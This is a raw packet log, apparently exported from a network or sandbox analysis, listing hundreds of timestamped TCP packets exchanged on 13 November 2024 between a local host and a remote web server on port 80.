                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943191051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943232059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943438053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943454981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943470001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943483114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943496943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.943505049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.944169044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975797892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975861073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975879908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975903988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975908995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975927114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975950003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975965977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975975990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975991964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.975996017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976010084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976026058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976032972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976043940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976061106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976070881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976077080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976094007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976139069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976139069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976150036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976166010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976181984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976197004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976222992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976238966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976254940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976265907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976265907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976265907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976270914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976294041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976304054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976310015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976329088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976346016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976438999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976438999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976634026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976664066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976680994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976696014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976705074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976720095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976735115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976749897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976749897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976749897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976751089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976768970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976783037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976799965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976804972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976804972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976814985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976831913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976846933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976861954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976869106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976870060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976878881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976896048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976906061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976912022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976928949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.976947069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977130890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977130890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977190971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977206945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977221966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977237940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977252960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977267981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977283001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977297068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977310896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977313042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977313042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977313042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977339029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977355957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977363110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977363110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977381945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977399111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977415085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977430105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977446079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977454901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977454901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977463961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977480888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977495909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977510929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977525949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977541924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977551937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977551937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977551937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977557898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977574110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977590084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977606058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977621078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977632046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977632046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977632046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977638006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977654934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977670908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977686882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977704048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977718115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977725983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977725983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977725983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977735043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977752924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977854013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.977854967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978126049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978143930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978158951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978174925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978189945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978207111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978221893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978239059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978247881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978247881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978247881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978279114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978296041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978322983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978338957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978353977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978368998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978384018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978393078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978393078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978401899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978415012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978418112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978436947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978451967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978466988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978481054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978497028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978499889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978499889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978499889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978513956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978538990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978554964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978573084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978585958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978585958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978624105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978893042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978912115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978926897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978941917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978959084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978974104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.978991032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979006052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979018927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979018927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979023933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979037046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979054928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979073048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979073048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979091883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979108095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979124069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979140043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979155064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979167938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979167938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979167938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979172945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979191065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979207039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979222059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979238033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979254007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979264975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979264975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979264975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979269981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979288101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979302883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979304075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979331017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979338884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979346991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979365110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979381084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979396105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979412079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979427099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979434967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979434967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979434967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979443073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979460001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979748964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979765892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979780912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979798079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979813099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979827881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979827881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979827881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979829073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979841948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979846001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979862928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979897022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979901075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979914904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979931116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979947090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979950905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979964018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979964018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.979984999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980005026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980012894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980029106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980043888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980060101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980066061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980066061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980076075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980093002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980108976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980113983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980128050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980144978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980144978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980163097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980178118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980195045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980207920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980207920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980210066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980226040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980227947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980243921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980259895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980274916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980289936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980294943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980321884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.980379105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016871929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016890049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016916990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016933918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016942978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.016952038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017034054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017045975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017064095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017080069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017097950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017123938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017123938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017143965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017160892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017177105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017193079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017208099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017215014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.017215967 CET4973380192.168.2.442.96.10.8
